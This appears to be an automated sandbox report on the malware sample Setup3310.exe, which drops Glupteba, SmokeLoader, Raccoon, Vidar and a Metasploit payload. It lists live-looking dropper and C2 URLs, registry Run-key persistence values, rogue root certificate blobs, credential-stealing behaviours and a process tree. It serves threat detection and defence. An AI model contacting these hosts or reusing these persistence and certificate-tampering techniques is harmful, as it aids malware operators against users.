glupteba | 344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e

Target

Setup3310.exe
Size

381KB
MD5

acf61459d6319724ab22cb5a8308d429
SHA1

8a5d782e6f31c3005e5e0706a3d266ece492a6cf
SHA256

344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e
SHA512

d5f38cb8ed500510ba7d466345c854856ec70121683d4b5398651bfd41a7f5f8d754e8fece0bca38e334214d326afa1970b19e79c3d8507bff9d7782df762877

Score

10^/10

glupteba metasploit raccoon smokeloader vidar afefd33a49c7cbd55d417545269920f24c85aa37 backdoor discovery dropper evasion loader persistence spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral1/memory/6584-404-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral1/memory/6584-406-0x00000000050B0000-0x000000000590D000-memory.dmp	family_glupteba
behavioral1/memory/6584-408-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Modifies boot configuration data using bcdedit 15 IoCs

pid	Process
14724	bcdedit.exe
14592	bcdedit.exe
14912	bcdedit.exe
15020	bcdedit.exe
8596	bcdedit.exe
15076	bcdedit.exe
15216	bcdedit.exe
736	bcdedit.exe
15348	bcdedit.exe
15392	bcdedit.exe
15504	bcdedit.exe
15608	bcdedit.exe
15684	bcdedit.exe
15740	bcdedit.exe
15852	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	HGT.exe

Executes dropped EXE 33 IoCs

pid	Process
848	Setup3310.tmp
2588	Setup.exe
3932	Setup.tmp
2712	Delta.exe
208	Delta.tmp
3132	Setup.exe
1604	PictureLAb.exe
2376	PictureLAb.tmp
2696	Setup.exe
1568	Setup.tmp
2056	HGT.exe
2448	prolab.exe
1780	ZHipigapybu.exe
732	prolab.tmp
15624	gaooo.exe
16316	jfiag3g_gg.exe
7320	jfiag3g_gg.exe
10556	hjjgaa.exe
10696	jfiag3g_gg.exe
15064	jfiag3g_gg.exe
5196	md7_7dfj.exe
8568	askinstall29.exe
14948	customer4.exe
15180	main.exe
1052	HookSetp.exe
15960	privacytools5.exe
16120	4784775.52
16180	6727327.73
16340	privacytools5.exe
16420	Windows Host.exe
16888	setup.exe
17068	MultitimerFour.exe
17304	multitimer.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000400000001a50e-157.dat	upx
behavioral1/files/0x000400000001a50e-158.dat	upx
behavioral1/files/0x000400000001a50e-167.dat	upx
behavioral1/files/0x000400000001a50e-168.dat	upx
behavioral1/files/0x000400000001a50e-175.dat	upx
behavioral1/files/0x000500000001a4e6-178.dat	upx
behavioral1/files/0x000500000001a4e6-179.dat	upx
behavioral1/memory/10020-531-0x0000000000400000-0x0000000000897000-memory.dmp	upx

Loads dropped DLL 13 IoCs

pid	Process
848	Setup3310.tmp
848	Setup3310.tmp
3932	Setup.tmp
3932	Setup.tmp
208	Delta.tmp
208	Delta.tmp
2376	PictureLAb.tmp
2376	PictureLAb.tmp
1568	Setup.tmp
3132	Setup.exe
3132	Setup.exe
15180	main.exe
16340	privacytools5.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Lejirokaedo.exe\""	HGT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gaooo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	6727327.73

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
64	ipinfo.io
276	api.ipify.org
294	ipinfo.io
225	ipinfo.io
11	ipinfo.io
56	ipinfo.io
223	ipinfo.io
613	ipinfo.io
616	ipinfo.io
8	ipinfo.io
98	ip-api.com
184	checkip.amazonaws.com
329	ipinfo.io
414	ip-api.com
568	checkip.amazonaws.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 15960 set thread context of 16340	15960	privacytools5.exe	132

Drops file in Program Files directory 23 IoCs

description	ioc	Process
File created	C:\Program Files\Java\OGMENEMCZI\prolab.exe	HGT.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-69U9G.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-67QJG.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Math.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\DockingToolbar.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-88ADN.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-CRJ6D.tmp	prolab.tmp
File created	C:\Program Files\Java\OGMENEMCZI\prolab.exe.config	HGT.exe
File created	C:\Program Files (x86)\Windows Defender\Lejirokaedo.exe	HGT.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-I6B33.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-PVEKE.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-UB378.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Imaging.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceLibrary.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-HG3HN.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-D7AC3.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-I6738.tmp	prolab.tmp

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
6740	4592	WerFault.exe	176
6816	4592	WerFault.exe	176
6900	4592	WerFault.exe	176
7108	4592	WerFault.exe	176
7216	4592	WerFault.exe	176
7972	4592	WerFault.exe	176
8076	4592	WerFault.exe	176
15056	15128	WerFault.exe	463

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2804	schtasks.exe
6420	schtasks.exe
11044	schtasks.exe
12652	schtasks.exe
13680	schtasks.exe
16144	schtasks.exe
14060	schtasks.exe
15548	schtasks.exe
2336	schtasks.exe
12368	schtasks.exe
12716	schtasks.exe
10380	schtasks.exe
13860	schtasks.exe
5736	schtasks.exe
17252	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
11672	timeout.exe
2816	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
5472	taskkill.exe
11604	taskkill.exe
10848	taskkill.exe
5896	taskkill.exe
4048	taskkill.exe
10588	taskkill.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	ZHipigapybu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall29.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall29.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	ZHipigapybu.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
9124	PING.EXE

Script User-Agent 21 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	293	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	622	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	71	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	224	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	48	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	55	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	64	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	67	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	235	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	615	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	46	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	328	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3932	Setup.tmp
3932	Setup.tmp
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
732	prolab.tmp
732	prolab.tmp
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2056	HGT.exe
Token: SeDebugPrivilege	1780	ZHipigapybu.exe
Token: SeDebugPrivilege	4048	taskkill.exe
Token: SeManageVolumePrivilege	5196	md7_7dfj.exe
Token: SeDebugPrivilege	10588	taskkill.exe
Token: SeManageVolumePrivilege	5196	md7_7dfj.exe
Token: SeManageVolumePrivilege	5196	md7_7dfj.exe
Token: SeDebugPrivilege	1052	HookSetp.exe
Token: SeDebugPrivilege	16120	4784775.52
Token: SeDebugPrivilege	17068	MultitimerFour.exe
Token: SeDebugPrivilege	16952	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
848	Setup3310.tmp
3932	Setup.tmp
208	Delta.tmp
2376	PictureLAb.tmp
732	prolab.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3920 wrote to memory of 848	3920	Setup3310.exe	72
PID 3920 wrote to memory of 848	3920	Setup3310.exe	72
PID 3920 wrote to memory of 848	3920	Setup3310.exe	72
PID 848 wrote to memory of 2588	848	Setup3310.tmp	76
PID 848 wrote to memory of 2588	848	Setup3310.tmp	76
PID 848 wrote to memory of 2588	848	Setup3310.tmp	76
PID 2588 wrote to memory of 3932	2588	Setup.exe	77
PID 2588 wrote to memory of 3932	2588	Setup.exe	77
PID 2588 wrote to memory of 3932	2588	Setup.exe	77
PID 3932 wrote to memory of 2712	3932	Setup.tmp	81
PID 3932 wrote to memory of 2712	3932	Setup.tmp	81
PID 3932 wrote to memory of 2712	3932	Setup.tmp	81
PID 2712 wrote to memory of 208	2712	Delta.exe	82
PID 2712 wrote to memory of 208	2712	Delta.exe	82
PID 2712 wrote to memory of 208	2712	Delta.exe	82
PID 208 wrote to memory of 3132	208	Delta.tmp	83
PID 208 wrote to memory of 3132	208	Delta.tmp	83
PID 208 wrote to memory of 3132	208	Delta.tmp	83
PID 3932 wrote to memory of 1604	3932	Setup.tmp	84
PID 3932 wrote to memory of 1604	3932	Setup.tmp	84
PID 3932 wrote to memory of 1604	3932	Setup.tmp	84
PID 1604 wrote to memory of 2376	1604	PictureLAb.exe	85
PID 1604 wrote to memory of 2376	1604	PictureLAb.exe	85
PID 1604 wrote to memory of 2376	1604	PictureLAb.exe	85
PID 2376 wrote to memory of 2696	2376	PictureLAb.tmp	86
PID 2376 wrote to memory of 2696	2376	PictureLAb.tmp	86
PID 2376 wrote to memory of 2696	2376	PictureLAb.tmp	86
PID 2696 wrote to memory of 1568	2696	Setup.exe	87
PID 2696 wrote to memory of 1568	2696	Setup.exe	87
PID 2696 wrote to memory of 1568	2696	Setup.exe	87
PID 1568 wrote to memory of 2056	1568	Setup.tmp	88
PID 1568 wrote to memory of 2056	1568	Setup.tmp	88
PID 2056 wrote to memory of 2448	2056	HGT.exe	89
PID 2056 wrote to memory of 2448	2056	HGT.exe	89
PID 2056 wrote to memory of 2448	2056	HGT.exe	89
PID 2056 wrote to memory of 1780	2056	HGT.exe	90
PID 2056 wrote to memory of 1780	2056	HGT.exe	90
PID 2448 wrote to memory of 732	2448	prolab.exe	91
PID 2448 wrote to memory of 732	2448	prolab.exe	91
PID 2448 wrote to memory of 732	2448	prolab.exe	91
PID 3132 wrote to memory of 3168	3132	Setup.exe	93
PID 3132 wrote to memory of 3168	3132	Setup.exe	93
PID 3132 wrote to memory of 3168	3132	Setup.exe	93
PID 3168 wrote to memory of 4048	3168	cmd.exe	95
PID 3168 wrote to memory of 4048	3168	cmd.exe	95
PID 3168 wrote to memory of 4048	3168	cmd.exe	95
PID 3168 wrote to memory of 2816	3168	cmd.exe	97
PID 3168 wrote to memory of 2816	3168	cmd.exe	97
PID 3168 wrote to memory of 2816	3168	cmd.exe	97
PID 1780 wrote to memory of 13660	1780	ZHipigapybu.exe	99
PID 1780 wrote to memory of 13660	1780	ZHipigapybu.exe	99
PID 13660 wrote to memory of 15624	13660	cmd.exe	101
PID 13660 wrote to memory of 15624	13660	cmd.exe	101
PID 13660 wrote to memory of 15624	13660	cmd.exe	101
PID 15624 wrote to memory of 16316	15624	gaooo.exe	102
PID 15624 wrote to memory of 16316	15624	gaooo.exe	102
PID 15624 wrote to memory of 16316	15624	gaooo.exe	102
PID 15624 wrote to memory of 7320	15624	gaooo.exe	103
PID 15624 wrote to memory of 7320	15624	gaooo.exe	103
PID 15624 wrote to memory of 7320	15624	gaooo.exe	103
PID 3932 wrote to memory of 10556	3932	Setup.tmp	105
PID 3932 wrote to memory of 10556	3932	Setup.tmp	105
PID 3932 wrote to memory of 10556	3932	Setup.tmp	105
PID 10556 wrote to memory of 10696	10556	hjjgaa.exe	106

C:\Users\Admin\AppData\Local\Temp\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Users\Admin\AppData\Local\Temp\is-53CJI.tmp\Setup3310.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-53CJI.tmp\Setup3310.tmp" /SL5="$2011E,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:848
- - C:\Users\Admin\AppData\Local\Temp\is-HAOUO.tmp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\is-HAOUO.tmp\Setup.exe" /Verysilent
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Users\Admin\AppData\Local\Temp\is-DA5U8.tmp\Setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-DA5U8.tmp\Setup.tmp" /SL5="$201EE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-HAOUO.tmp\Setup.exe" /Verysilent
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3932
    - - C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\Delta.exe" /Verysilent
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2712
      - C:\Users\Admin\AppData\Local\Temp\is-O3346.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-O3346.tmp\Delta.tmp" /SL5="$1025C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\Delta.exe" /Verysilent
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:208
        
